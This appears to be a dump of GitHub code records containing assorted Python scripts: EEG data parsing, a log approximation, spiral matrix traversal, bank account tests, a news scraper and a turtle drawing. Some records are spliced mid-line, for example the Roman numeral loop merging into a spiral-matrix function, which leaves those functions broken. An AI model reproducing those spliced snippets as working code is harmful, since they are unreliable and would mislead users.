/muse/elements/experimental/concentration\": (0, 0)}\r\n amountofpics = 8\r\n timePer = 20\r\n starttime = int(math.floor(float(firstrow[0])))\r\n lasttime = starttime + timePer\r\n currentQuestion = 1\r\n resList = []\r\n\r\n for row in reader:\r\n if (int(math.floor(float(row[0]))) >= lasttime):\r\n starttime = lasttime\r\n lasttime = starttime + timePer\r\n newlist = calculatewaves(wavesDict)\r\n resList.append(newlist)\r\n wavesDict = resetWavesDict()\r\n currentQuestion += 1\r\n\r\n if (currentQuestion > amountofpics):\r\n break\r\n # tuple to carry values and count of a eeg\r\n currRes = (0, 0)\r\n if row[1] == \" /muse/elements/alpha_absolute\":\r\n # get values and count, update dictionary, and also the result page\r\n currRes = addabsolute(row)\r\n oldValues = wavesDict[row[1]]\r\n wavesDict[row[1]] = (oldValues[0] + currRes[0], oldValues[1] + currRes[1])\r\n if row[1] == \" /muse/elements/beta_absolute\":\r\n currRes = addabsolute(row)\r\n oldValues = wavesDict[row[1]]\r\n wavesDict[row[1]] = (oldValues[0] + currRes[0], oldValues[1] + currRes[1])\r\n if row[1] == \" /muse/elements/gamma_absolute\":\r\n currRes = addabsolute(row)\r\n oldValues = wavesDict[row[1]]\r\n wavesDict[row[1]] = (oldValues[0] + currRes[0], oldValues[1] + currRes[1])\r\n if row[1] == \" /muse/elements/experimental/concentration\":\r\n oldValues = wavesDict[row[1]]\r\n if row[1] != \"nan\":\r\n wavesDict[row[1]] = (oldValues[0] + float(row[2]), oldValues[1] + 1)\r\n\r\n print(len(resList))\r\n upperbound = resList[1]\r\n lowerbound = resList[3]\r\n compare = resList[5]\r\n compare2 = resList[7]\r\n print(resList)\r\n results = (rateWaves(lowerbound, upperbound, compare))\r\n results2 = (rateWaves(lowerbound, upperbound, compare2))\r\n #display results\r\n\r\n pygame.init()\r\n display_width = 800\r\n display_height = 600\r\n black = (0, 0, 0)\r\n white = (255, 255, 255)\r\n red = (255, 0, 0)\r\n gameDisplay = pygame.display.set_mode((display_width, display_height))\r\n pygame.display.set_caption(\"hi\")\r\n basicfont = pygame.font.SysFont(None, 40)\r\n crashed = False\r\n while not crashed:\r\n\r\n for event in pygame.event.get():\r\n if event.type == 
pygame.QUIT:\r\n crashed = True\r\n text = basicfont.render(\"Old Spice\", True, (255, 255, 255), (0, 0, 0))\r\n textrect = text.get_rect()\r\n textrect.center = ((display_width / 2), (1 * display_height / 11))\r\n gameDisplay.blit(text, textrect)\r\n text = basicfont.render('Alpha: ' + str(results[0]), True, (255, 255, 255), (0, 0, 0))\r\n textrect = text.get_rect()\r\n textrect.center = ((display_width / 2), (2 * display_height / 11))\r\n gameDisplay.blit(text, textrect)\r\n text2 = basicfont.render('Beta: ' + str(results[1]), True, (255, 255, 255), (0, 0, 0))\r\n textrect2 = text.get_rect()\r\n textrect2.center = ((display_width / 2), (3*display_height / 11))\r\n gameDisplay.blit(text2, textrect2)\r\n text3 = basicfont.render('Gamma: ' + str(results[2]), True, (255, 255, 255), (0, 0, 0))\r\n textrect3 = text3.get_rect()\r\n textrect3.center = ((display_width / 2), (4*display_height / 11))\r\n gameDisplay.blit(text3, textrect3)\r\n text4 = basicfont.render('Concentration: ' + str(results[3]), True, (255, 255, 255), (0, 0, 0))\r\n textrect4 = text4.get_rect()\r\n textrect4.center = ((display_width / 2), (5*display_height / 11))\r\n gameDisplay.blit(text4, textrect4)\r\n ##########################################\r\n text = basicfont.render(\"Chevy\", True, (255, 255, 255), (0, 0, 0))\r\n textrect = text.get_rect()\r\n textrect.center = ((display_width / 2), (6 * display_height / 11))\r\n gameDisplay.blit(text, textrect)\r\n\r\n text = basicfont.render('Alpha: ' + str(results2[0]), True, (255, 255, 255), (0, 0, 0))\r\n textrect = text.get_rect()\r\n textrect.center = ((display_width / 2), (7*display_height / 11))\r\n gameDisplay.blit(text, textrect)\r\n text2 = basicfont.render('Beta: ' + str(results2[1]), True, (255, 255, 255), (0, 0, 0))\r\n textrect2 = text.get_rect()\r\n textrect2.center = ((display_width / 2), (8 * display_height / 11))\r\n gameDisplay.blit(text2, textrect2)\r\n text3 = basicfont.render('Gamma: ' + str(results2[2]), True, (255, 255, 255), (0, 0, 0))\r\n textrect3 = text3.get_rect()\r\n textrect3.center = ((display_width / 2), (9 * display_height / 11))\r\n gameDisplay.blit(text3, textrect3)\r\n text4 = basicfont.render('Concentration: ' + str(results2[3]), True, (255, 255, 255), (0, 0, 0))\r\n textrect4 = text4.get_rect()\r\n textrect4.center = ((display_width / 2), (10 * display_height / 11))\r\n gameDisplay.blit(text4, textrect4)\r\n pygame.display.update()\r\n\r\n #f.close()\r\n","repo_name":"TidesMind/DubHacks","sub_path":"CSVParse.py","file_name":"CSVParse.py","file_ext":"py","file_size_in_byte":7761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"38010465002","text":"import re\nidxPhoneDic = {}\nwith open('/tmp4/eric11220/MLDS_Final/conf/48-idx.map', 'U') as inf:\n for line in inf:\n phone, idx = line.strip().split(' ')\n idxPhoneDic[int(idx)] = phone\n\n \ntheirMapDic = {}\nwith open('/tmp4/eric11220/MLDS_Final/conf/48_idx_chr.map', 'U') as inf:\n for line in inf:\n line = line.strip()\n line = re.split('\\t| +', line)\n first, sec, third = line\n theirMapDic[first] = int(sec)\n\noutf = open('predict_results', 'w')\nwith open('7models.txt', 'U') as inf:\n inf.readline()\n for line in inf:\n idx, label = line.strip().split(',')\n outf.write(str(theirMapDic[label]) + 
'\\n')\n\n\n","repo_name":"changjenyin/DNN_HMM_RNN_speech","sub_path":"data_preprocessing/others_mapping/map_to_their_map.py","file_name":"map_to_their_map.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"41"} +{"seq_id":"20094769021","text":"a=int(input(\"enter the numbers\"))\r\nsum=0\r\ntemp=a\r\nwhile temp!=0:\r\n i=temp%10\r\n sum=sum+i*i*i\r\n temp=temp//10\r\nif (a==sum):\r\n print(\"armstrong number\")\r\nelse:\r\n print(\"non armstrong number\")","repo_name":"iamsuryakant/knighthood","sub_path":"armstrong.py","file_name":"armstrong.py","file_ext":"py","file_size_in_byte":204,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"41"} +{"seq_id":"70809899964","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Apr 23 13:24:03 2019\r\n\r\n@author: User\r\n\"\"\"\r\nfrom matplotlib.pyplot import *\r\nfrom scipy import *\r\nimport scipy.integrate as integrate\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\n\r\n\r\ndef fastlogapprox(x, n):\r\n a = zeros(n)\r\n g = zeros(n)\r\n d = zeros((n,n))\r\n a[0] = 0.5*(1+x)\r\n g[0] = sqrt(x)\r\n for i in range(1,n):\r\n a[i] = 0.5*(a[i-1]+g[i-1])\r\n g[i] = sqrt(a[i]*g[i-1])\r\n d[0,:] = a\r\n for i in range(0,n):\r\n d[i,i] = (a[i] - 4**(-i)*a[i-1])/(1-4**(-i))\r\n return (x-1)/d[-1,-1]\r\n\r\nfor k in range(1, 5):\r\n x_vals = np.linspace(0, 100, 1000)\r\n y_vals = fastlogapprox(x_vals, k)\r\n plt.plot(x_vals, y_vals)\r\n plt.title (\"shit\")\r\n plt.xlabel('x')\r\n plt.ylabel('square root of x')\r\n plt.legend()\r\n plt.show()\r\n\r\n\r\n\r\nq = np.abs(np.log(3) - fastlogapprox(3,2))\r\nw = np.abs(np.log(3) - fastlogapprox(3,3))\r\nr = np.abs(np.log(3) - fastlogapprox(3,4))\r\nt = np.abs(np.log(3) - fastlogapprox(3,5))\r\nu = 1e-19\r\nz = 1e-05\r\n\r\nplt.plot(3, q, color='blue', label='2 Iterations')\r\nplt.plot(3, w, color='green', label='3 Iterations')\r\nplt.plot(3, r, color='red', label='4 Iterations')\r\nplt.plot(3, t, color='cyan', label='5 Iterations')\r\nplt.legend(loc='upper left')\r\nplt.title('Error behavior of the accelerated Carlsson Method for the log')\r\nplt.xlabel('x')\r\nplt.ylabel('error')\r\nplt.axis([0, 20, u, z])\r\nplt.show()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n#def applog(a,x):\r\n# a0=(1+x)/2\r\n# b0=sqrt(x)\r\n# a=[]\r\n#\r\n# for i in range(n):\r\n# a0=(a0+b0)/2\r\n# b0=sqrt((a0)*b0)\r\n# a.append(n)\r\n#\r\n# return np.array((x-1)/a0)\r\n\r\n\r\n\r\n\r\n#print(\"the log approximation is: \" , ((applog(4,4))))\r\n#print(\"log value----------------:\" , (np.log(4)) )\r\n\r\n#error=(abs( applog(4,4)- (np.log(4)) ) )\r\n#print(\"the error is : \", error)\r\n\r\n\r\n#x = np.linspace(10, 500, 100)\r\n#plt.plot(x, (applog(4,x)),color='blue', label='approx ln(x)' )\r\n#plt.plot(x, np.log(x), color='red', label='ln(x)')\r\n#plt.legend(loc='upper left')\r\n#plt.show()\r\n#plt.plot(x,abs(np.log(x)-applog(4,x)) )\r\n#plt.show()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nprint(\"----------------------------------------------------------------------\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n#x = 4\r\n#def a_0(x):\r\n#\treturn 0.5*(1+x)\r\n#def g_0(x):\r\n#\treturn sqrt(x)\r\n#m_1 = {}\r\n#m_2 = {}\r\n#def H(n):\r\n#\tif n in m_1 and m_2:\r\n#\t\treturn m_1[n]\r\n#\t\treturn m_2[n]\r\n#\tif n == 0:\r\n#\t\tm_1[n] = a_0(x)\r\n#\t\tm_2[n] = g_0(x)\r\n#\telif n == 1:\r\n#\t\tm_1[n] = 0.5*(a_0(x) + g_0(x))\r\n#\t\tm_2[n] = 
sqrt(g_0(x)*0.5*(a_0(x) + g_0(x)))\r\n#\telif n >= 2:\r\n#\t\tm_1[n] = 0.5*(m_1[n-1] + m_2[n-1])\r\n#\t\tm_2[n] = sqrt(m_1[n]*m_2[n-1])\r\n#\treturn m_1[n] and m_2[n]\r\n\r\n\r\n#Q = {r:H(r) for r in range(1, 40000)}\r\n#M = [H(k) for k in range(0,40000)]\r\n#A = [m_1[k] for k in range(0,40000)]\r\n#print(\"--------------------------------------------\")\r\n#m_4 = {}\r\n#N = list(A)\r\n#n = 3\r\n#X = x-2\r\n#def leg(x,n):\r\n#\tdef d(v,n):\r\n#\t\tif v in m_4:\r\n#\t\t\treturn m_4[v]\r\n#\t\tif v == 0:\r\n#\t\t\tR = A[n]\r\n#\t\telif v == 1:\r\n#\t\t\tR = (A[n] -(2**(-2))*A[n-1])/(1- 2**(-2))\r\n#\t\telif v >= 2:\r\n#\t\t\tR = (d(v-1, n) -(2**(-2*v))*d(v-1, n-1))/(1-2**(-2*v))\r\n#\t\tm_4[v] = R\r\n#\t\treturn R\r\n#\treturn (1+x)/d(n,n)\r\n#print(leg(X,n))\r\n#\r\n#x_v = linspace(3, 4003, 100000)\r\n#n_q = range(1, 10)\r\n#y_1 = leg(2,n)\r\n#y_2 = abs(leg(2,n_q)- log(2))\r\n##plot(x_v ,y_1, label='leg(x,n)')\r\n#plot(x_v ,y_2, label='error')\r\n#title ('plopp')\r\n#xlabel('x')\r\n#ylabel('leg(x)')\r\n#legend()\r\n#show()\r\n\r\n\r\n\r\n#print(\"-------------------------------------------\")\r\n\r\n#X = x-2\r\n#def leg(X):\r\n#\treturn (1+X)/d(n,n)\r\n#print(\"______________\")\r\n#print(leg(X))\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"AmerHussein/Tensor-class","sub_path":"Ny mapp/hectors log(x).py","file_name":"hectors log(x).py","file_ext":"py","file_size_in_byte":3626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"19897508628","text":"\n# coding: utf-8\n\n# In[201]:\n\nimport requests\nfrom bs4 import BeautifulSoup\nimport dateutil.parser as parser\nimport time\n\nclass News:\n Article = ''\n Title = ''\n Author = ''\n OriginalContent = ''\n CreatedDate = ''\n FetchedDate = ''\n ArticleUrl = ''\n LastUsed = ''\n \n def __init__(self, article , title , author , originalcontent , createddate , fetcheddate , articleurl , lastused ):\n self.Article = article\n self.Title = title\n self.OriginalContent = originalcontent\n self.CreatedDate = createddate\n self.FetchedDate = fetcheddate\n self.ArticleUrl = articleurl\n self.LastUsed = lastused\n self.Author = author\n \ndef scraping(href):\n headers = {'user-agent' : 'Mozilla/5.0'}\n if (requests.get(href, headers = headers)):\n source = requests.get(href, headers = headers)\n if (BeautifulSoup(source.content, \"lxml\")):\n soup = BeautifulSoup(source.content, \"lxml\").body \n news = News(None, None, None, None, None, None, None, None)\n date = time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time()))\n news.fetchedDate = date\n news.lastUsed = date \n news.articleUrl = href\n \n class_list_main = [ \n 'col-md-12',\n 'content-wrapper clearfix detail-block-md',\n 'entry-content',\n 'column column-two-third site-content',\n 'large-8 medium-12 columns first',\n 'article',\n 'article_body'\n 'container',\n 'span8'\n ]\n \n for i in range(len(class_list_main)):\n if (soup.findAll(\"\",{'class':class_list_main[i]})):\n# print(class_list_main[i])\n content_list = soup.findAll(\"\",{'class':class_list_main[i]})\n# print (content_list)\n for content in content_list:\n scrape_details(content,news)\n break\n else:\n content = soup\n scrape_details(content,news)\n \n print ('URL********************************************************')\n print (news.articleUrl)\n print ('TITLE********************************************************')\n print (news.title)\n print ('DATE********************************************************')\n print 
(news.createdDate)\n print ('AUTHOR********************************************************')\n print (news.author)\n print ('ARTICLE********************************************************')\n print (news.article) \n else:\n print ('can not get the information!')\n else:\n print ('can not connect to the web page!')\n \n\n\n# In[216]:\n\ndef scrape_details(content,news): \n news.content = content\n# print (news.content)\n class_list_title = [\n 'entry-title',\n 'entry-title single-title',\n 'col-lg-9 col-md-8',\n 'name post-title entry-title',\n 'articleTitle',\n 'artTitle',\n 'blog-title',\n 'postarea',\n 'full-page-article left-col',\n 'post_title',\n 'post-title',\n 'content-header ',\n 'field-subhead'\n ] \n for i in range(len(class_list_title)):\n if (content.find('',{'class':class_list_title[i]})):\n news.title = content.find('',{'class':class_list_title[i]}).text\n break\n else:\n news.title = None\n\n class_list_paragraph = [\n 'ArticleBody__articleBody___1GSGP',\n 'art-postcontent',\n 'articles2',\n 'article-inner',\n 'article-text', \n 'article-content',\n 'article-copy',\n 'article_body',\n 'articleContentData',\n 'b-item__description',\n 'content-main',\n 'content-text', \n 'entry-content clearfix',\n 'entry-content full-content',\n 'entry clearfix', \n 'entry-content', \n 'entry_content',\n 'entry-content print-only',\n 'entry-body',\n 'entry', \n 'entry entry-content',\n 'event-text', \n 'entry-content-text',\n 'field-item even',\n 'field-body',\n 'infopage-news',\n 'td-post-content', \n 'the-content cf',\n 'thecontent',\n 'td-post-content td-pb-padding-side',\n 'ntText', \n 'post-single', \n 'post-content entry-content cf', \n 'post-body entry-content', \n 'post_entry', \n 'post-content clearfix', \n 'post-bodycopy clearfix',\n 'post-single-content box mark-links',\n 'post-9141 post type-post status-publish format-standard has-post-thumbnail hentry category-world tag-fake-news tag-featured tag-satire',\n 'vw-post-content clearfix',\n 'wpb_wrapper',\n 'single-box clearfix entry-content',\n 'sqs-block-content',\n 'left relative'\n ]\n\n news.article = []\n for i in range(len(class_list_paragraph)):\n if (content.find('div',{'class': class_list_paragraph[i]})): \n# print (class_list_paragraph[i])\n paragraphs = content.find('',{'class': class_list_paragraph[i]})\n if (paragraphs.findAll('p')):\n# print (paragraphs)\n for paragraph in paragraphs.findAll('p'):\n news.article.append(paragraph.text)\n# print (news.article)\n break\n else: \n news.article = []\n\n class_list_author = [\n 'postmetadata',\n 'author-article-link',\n 'field-author',\n 'name',\n 'url fn n',\n 'author vcard',\n 'author left-edge',\n 'author has-bio',\n 'author',\n 'artAuthor',\n 'post-author',\n 'meta pf-author',\n 'author-name vcard fn'\n ]\n\n for i in range(len(class_list_author)):\n if (content.find('',{'class': class_list_author[i]})):\n# print (class_list_author[i])\n news.author = content.find(\"\",{'class':class_list_author[i]}).text \n# print (news.author)\n break\n else:\n news.author = None\n\n\n class_list_date = [\n 'entry-date published',\n 'entry-date published updated',\n 'content-published-mobile',\n 'entry-date',\n 'entry-meta',\n 'entry-meta-date updated',\n 'byline byline-left ',\n 'pub_date',\n 'post-date updated',\n 'timestamp',\n 'time',\n 'article-details',\n 'article_date',\n 'artData',\n 'field-post-date',\n ]\n\n for i in range(len(class_list_date)):\n if (content.find('',{'class': class_list_date[i]})):\n# print(class_list_date[i])\n news.createdDate = content.find('',{'class': 
class_list_date[i]})\n# print (news.createdDate.text)\n try:\n news.createdDate = (parser.parse(news.createdDate['datetime'])).isoformat()\n except:\n news.createdDate = (parser.parse(news.createdDate.text)).isoformat()\n\n break\n else:\n news.createdDate = None\n\n return\n\n\n\n# link = 'http://www.thedailysheeple.com/astronomers-detect-strange-radio-signals-from-nearby-star_072017'\n# FAKE:\n# link = 'http://awm.com/will-this-latest-blunder-be-the-final-nail-in-the-coffin-for-the-worst-show-in-tv-history/?utm_medium=homepage&utm_source=homepage1'\n# link = 'http://americannews.com/beware-new-doll-meant-indoctrinate-sharia-law-children-coming-home/'\n# UNRELIABLE:\n# link = 'http://www.anonews.co/cop-drugs-frame/'\n# link = 'http://anonhq.com/london-terror-attacks-brits-celebrating-beer-hero/'\n# SATIRE\n# link = 'http://empirenews.net/hillary-clinton-undergoes-sex-change-operation-so-she-has-a-better-chance-at-winning-2020-election/'\n# link = 'http://realnewsrightnow.com/2017/05/texas-lawmaker-called-ice-mother-law-dinner-table-dispute/'\n# Conspiracy:\n# link = 'http://anotherdayintheempire.com/distraction-du-jour-trump-punches-cnn/'\n# link = 'http://conservativefiringline.com/va-removes-top-2-officials-manchester-va-hospital/'\n# HATE:\n# link = 'http://www.frontpagemag.com/fpm/267321/nevertrump-nostalgia-hillary-never-was-daniel-greenfield'\n# link = 'http://www.vdare.com/articles/said-in-spanish-dual-citizen-actress-activist-tells-illegals-how-not-to-get-arrested-a-new-app-for-dreamers-the-america-thing-etc'\n# BIAS\n# link = 'http://www.americanthinker.com/articles/2017/07/europe_downward_now_the_bavarians_want_to_leave.html'\n# link = 'http://100percentfedup.com/watch-rep-steve-kings-bombshell-answer-trumps-wall-hasnt-built-yet-video/'\n# Junk:\n# link = 'http://www.celebtricity.com/nicki-minaj-files-10m-lawsuit-against-remy-ma-for-using-her-voice-in-diss-song-on-itunes/'\n# link = 'https://www.scoopwhoop.com/india-inhuman-rape-cases/#.6j9dfreps'\n# Political:\n# link = 'http://thelastlineofdefense.org/breaking-president-trump-wants-you-to-know-the-truth-about-agenda-21/'\n# link = 'http://www.defenddemocracy.press/one-week-after-mosuls-liberation-horror-of-us-siege-continues-to-unfold/'\n# CLICKBAIT\n# link = 'http://americablog.com/2017/07/cbo-gop-obamacare-repeal-22m-uninsured-13k-deductible-premiums-soar-older.html'\nlink = 'http://americanlookout.com/rms-corruption-more-obama-officials-scrutinized-in-unmasking-probe-video/'\nscraping(link)\n\n\n# In[ ]:\n\n\n\n\n# In[ ]:\n\n\n\n","repo_name":"XiaoshengLiang/Project","sub_path":"Scraping_for_all/Scraping0720.py","file_name":"Scraping0720.py","file_ext":"py","file_size_in_byte":10445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"37472438018","text":"'''\r\n2020来恩杯:第 5 题 找出可能的钝角三角形的最长周长\r\nAuthor:Yotrew Wing\r\n2022/10/09\r\nhttps://github.com/yotrew\r\n\r\n钝角三角形:a^2+b^2c^2\r\n直角三角形:a^2+b^2=c^2\r\n三角形:a+b>c\r\n\r\n解法:\r\na一定是输入资料的最小值,c一定是输入资料的最大值,只须找b\r\n\r\n解法2:\r\n若直接a是最小值, b,c最大值2个,答案会对吗?(会有测资造成此条件错误吗?)\r\n'''\r\n\r\nn=int(input())\r\nedge=list(map(int,input().split(\" \")))\r\nedge.sort()\r\n#print(edge)\r\na=edge[0]\r\nc=edge[-1]\r\n\r\nfor i in range(len(edge)-2,0,-1): #n-1~1,因为要找最大值,所以b从最后倒数第2个开始\r\n b=edge[i]\r\n #print(a,b,c,a**2,b**2,c**2,(a+b+c))\r\n if a**2+b**2=1 and next_row <=8 and next_column >=1 and next_column <=8:\r\n result +=1\r\n\r\nprint(result)","repo_name":"philoleben/HufsAlgorithm2021","sub_path":"04_Implementation/왕실의 
나이트_세인.py","file_name":"왕실의 나이트_세인.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"12609655718","text":"dis ={\"I\":1,\"V\":5,\"X\":10,\"L\":50,\"C\":100,\"D\":500,\"M\":1000}\r\nstr=input(\"enter the roman no\")\r\nprev=0\r\ncur=0\r\nres=0\r\nfor i in range (len(str)-1,-1,-1):\r\n cur=dis[str[i]]\r\n if (cur list[int]:\n\n arr = []\n\n bottom = len(matrix) - 1\n right = len(matrix[0]) - 1\n\n top, left = 0, 0\n\n if bottom < 1:\n raise ValueError(\"m should be greater than 1\")\n\n if right + 1 > 10:\n raise ValueError(\"n should be less than 10\")\n\n while True:\n if left > right:\n break\n\n # top row\n for i in range(left, right + 1):\n arr.append(matrix[top][i])\n top += 1\n\n if top > bottom:\n break\n\n # right column\n for i in range(top, bottom + 1):\n arr.append(matrix[i][right])\n right -= 1\n\n if left > right:\n break\n\n # bottom row\n for i in range(right, left - 1, -1):\n arr.append(matrix[bottom][i])\n bottom -= 1\n\n if top > bottom:\n break\n\n # left column\n for i in range(bottom, top - 1, -1):\n arr.append(matrix[i][left])\n left += 1\n\n return arr\n","repo_name":"Zygmut/programming_problems","sub_path":"Spiral matrix/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"41"} +{"seq_id":"24524515664","text":"import uuid\n\nimport pytest\n\nfrom account import Account\n\n\ndef test_account_deposit():\n acc = Account(uuid.uuid4())\n\n acc.deposit(100)\n\n assert acc.balance == 100\n\n\ndef test_account_withdrawal_enough_balance():\n acc = Account(uuid.uuid4(), balance=100)\n\n acc.withdrawal(100)\n\n assert acc.balance == 0\n\n\ndef test_account_withdrawal_short_balance():\n acc = Account(uuid.uuid4())\n\n with pytest.raises(BalanceTooLow):\n acc.withdrawal(100)\n\n\ndef test_account_history_log():\n acc_no = uuid.uuid4()\n acc = Account(acc_no, balance=100)\n acc.withdrawal(100)\n with pytest.raises(BalanceTooLow):\n acc.withdrawal(100)\n acc.deposit(100)\n cash = acc.close()\n\n assert cash == 100\n assert acc.history == sorted(acc.history) # is it sorted?\n assert [x.message for x in acc.history] == [\n f\"Account {acc_no} opened with balance 100\",\n \"Withdrawal 100\",\n \"Withdrawal 100 failed. BalanceTooLow\",\n \"Deposit 100\",\n f\"Account {acc_no} closed. Returned 100 cash\",\n ]\n","repo_name":"CodingDojoSilesia/banking-kata","sub_path":"test_account.py","file_name":"test_account.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"24718857408","text":"# /usr/bin/env python3\n# -*- coding: utf-8 (ü) -*-\n\"\"\"!\n@file Vector3.py\n\n@author Olaf Simon\n@date 14.4.2022\n\n@brief Provides functions extending the python 'math' library\n\"\"\"\n\nimport math\n\ndef normSquare(data: []):\n res = 0\n for i in data:\n res = res + i**2\n return res\n\ndef norm(data: []):\n return math.sqrt(normSquare(data))\n\ndef tan2(r, phi):\n \"\"\"! @brief Delivers a touple (y, x) of cartesian coordinates from given magnitude r and angle phi\n The order is chosen that way for compatibility to the invers function of phi = math.atan2(y, x) using r=1!\n \"\"\" \n return (r*math.sin(phi), r*math.cos(phi)) \n\n\nif __name__ == '__main__':\n \n print(\"- BibPi math functions \")\n print(\" - Norm, magnitude or length of an iterable class e.g. 'list'. 
Test deliveres 5\")\n print(norm([3, 4]))\n print(\" - Function tan2 delivering a tuple of (y, x). It is the inverse function of math.atan2(y, x). Test uses (y=4, x=3)\")\n v = (4, 3)\n r = norm(v)\n phi = math.atan2(v[0], v[1])\n print(tan2(r, phi))\n","repo_name":"OlafSimon/me2grid","sub_path":"library/me2grid/BibPy/mathlib/mathext.py","file_name":"mathext.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"5774212299","text":"import datetime\n\n\ndef counter(func):\n def wrapper(*args):\n start = datetime.datetime.now()\n res = func(*args)\n finish = datetime.datetime.now() - start\n print(finish)\n return res\n return wrapper\n\n@counter\ndef longest_words1(file):\n with open(file, encoding=\"utf-8\") as text:\n cont = text.read().split()\n word_length = 0\n final_result = []\n for i in cont:\n if len(i) > word_length:\n word_length = len(i)\n final_result.clear()\n final_result.append(i)\n elif len(i) == word_length:\n final_result.append(i)\n return final_result\n\n@counter\ndef longest_words2(file):\n with open(file, encoding='utf-8') as text:\n words = text.read().split()\n max_length = len(max(words, key=len))\n sought_words = [word for word in words if len(word) == max_length]\n if len(sought_words) == 1:\n return sought_words[0]\n return sought_words\n\nfile = \"article.txt\"\nprint('1', longest_words1(file))\nprint('2', longest_words2(file))\n\n\n","repo_name":"shvike/1-Codewars","sub_path":"Decorator.py","file_name":"Decorator.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"40910814855","text":"import numpy as np\nimport scipy.stats\nimport matplotlib.pyplot as plt\nfrom uncertainties import ufloat\n\n# part a) --------------------------\nL = ufloat(0.7, 0.014)\nh = ufloat(0.03, 0.003)\nb = ufloat(0.04, 0.0004)\nF = ufloat(80, 0.8)\ndelta = ufloat(0.008, 0.00008)\n\nI = b * h ** 3 / 12\nE = F * L ** 3 / (3 * delta * I)\nE /= 1E9 #present in GPa\nprint(\"E analytic: \", E)\n\n\n# part b) ----------------------------------\nL_base = 0.7\nh_base = 0.03\nb_base = 0.04\nF_base = 80\ndelta_base = 0.008\n\n\nE_x = np.linspace(E.n - 4 * E.s, E.n + 4 * E.s, num=200)\nE_y = scipy.stats.norm.pdf(E_x, E.n, E.s)\nplt.plot(E_x, E_y, color='orange', label=\"Analytical\")\n\n\nN = 10000\nE_results = np.zeros(N)\nfor i in range(N):\n rand_nums = np.random.standard_normal(5)\n\n L = L_base + rand_nums[0] * 0.014\n h = h_base + rand_nums[1] * 0.003\n b = b_base + rand_nums[2] * 0.0004\n F = F_base + rand_nums[3] * 0.8\n delta = delta_base + rand_nums[4] * 0.00008\n\n I = b * h ** 3 / 12\n E_results[i] = F * L ** 3 / (3 * delta * I)\n\nE_results /= 1E9 #present in GPA\nplt.hist(E_results, bins=30, density=True, label=\"Simulated\", histtype='step', color='#0000ff')\n\nplt.xlabel(\"E (GPa)\")\nplt.ylabel(r\"Probability density (GPa$ ^{-1}$)\")\nplt.title(\"PDF for E, determined analytically and by Monte Carlo simulation\")\n\nE_avg = np.average(E_results)\nE_uncer = np.std(E_results)\n# plt.axvline(E_avg, color='c', label=\"Average simulated E\") #cyan\n# plt.axvline(E_avg + E_uncer, color='c', dashes=(5, 5), label=r\"Average \\pm 1\\sigma\")\n# plt.axvline(E_avg - E_uncer, color='c', dashes=(5,5))\n\nplt.legend()\n\nplt.savefig(f'Q2.png', bbox_inches='tight')\nprint(E_avg)\nprint(E_uncer)\n# 
plt.show()\n","repo_name":"jesseli2002/MECH306Tutorial3","sub_path":"q2.py","file_name":"q2.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"22246053479","text":"\"\"\"\nEvan Galli et Maxence Lécard\nCe module contient le code chargé du dessin du decor\nTheme: Hiver\n\"\"\"\n\nimport turtle\nimport random\nimport math\nimport itertools\n\nimport formes\nimport cartes\n\n\ndef main(screenX: int, screenY: int, t: turtle.Turtle):\n \"\"\"Le decor dessine avec la tortue t\"\"\"\n\n leftScreen = screenX / -2\n rightScreen = -leftScreen\n bottomScreen = screenY / -2\n\n # On trace le sol\n solHauteur = 250\n formes.rectangle(leftScreen, bottomScreen, 1000, solHauteur, \"#EFEDED\", t)\n\n turtle.bgcolor(\"midnightblue\") # On defini la couleur du fond (ciel)\n\n # On trace les bonhommes de neige\n etoilesLeftY = bonhommeDeNeige(leftScreen + 50, bottomScreen + 100, t)\n etoilesRightY = bonhommeDeNeige(rightScreen - 150, bottomScreen + 100, t)\n\n # Generation et affichage des etoiles\n tailleEtoiles = 25 # Taille maximale d'une etoile\n gapEtoiles = tailleEtoiles * 2 # Espacement entre chaque coordonnees d'etoile\n coordonneesEtoiles = generateEtoiles(\n # Etoiles a gauche\n leftScreen, # X\n etoilesLeftY, # Y\n abs(leftScreen - cartes.xGrille) - tailleEtoiles, # W\n screenY - abs(etoilesLeftY) - tailleEtoiles, # H\n gapEtoiles, # Espacement\n random.randint(10, 20), # Nb\n )\n coordonneesEtoiles += generateEtoiles(\n # Etoiles a droite\n cartes.xGrille + cartes.longueurGrille,\n etoilesRightY,\n abs(rightScreen + cartes.xGrille) - tailleEtoiles,\n screenY - abs(etoilesRightY) - tailleEtoiles,\n gapEtoiles,\n random.randint(10, 20),\n )\n etoiles(coordonneesEtoiles, turtle.Turtle(visible=False))\n\n\ndef generateEtoiles(left, bottom, width, height, gap, quantity):\n \"\"\"Generes une 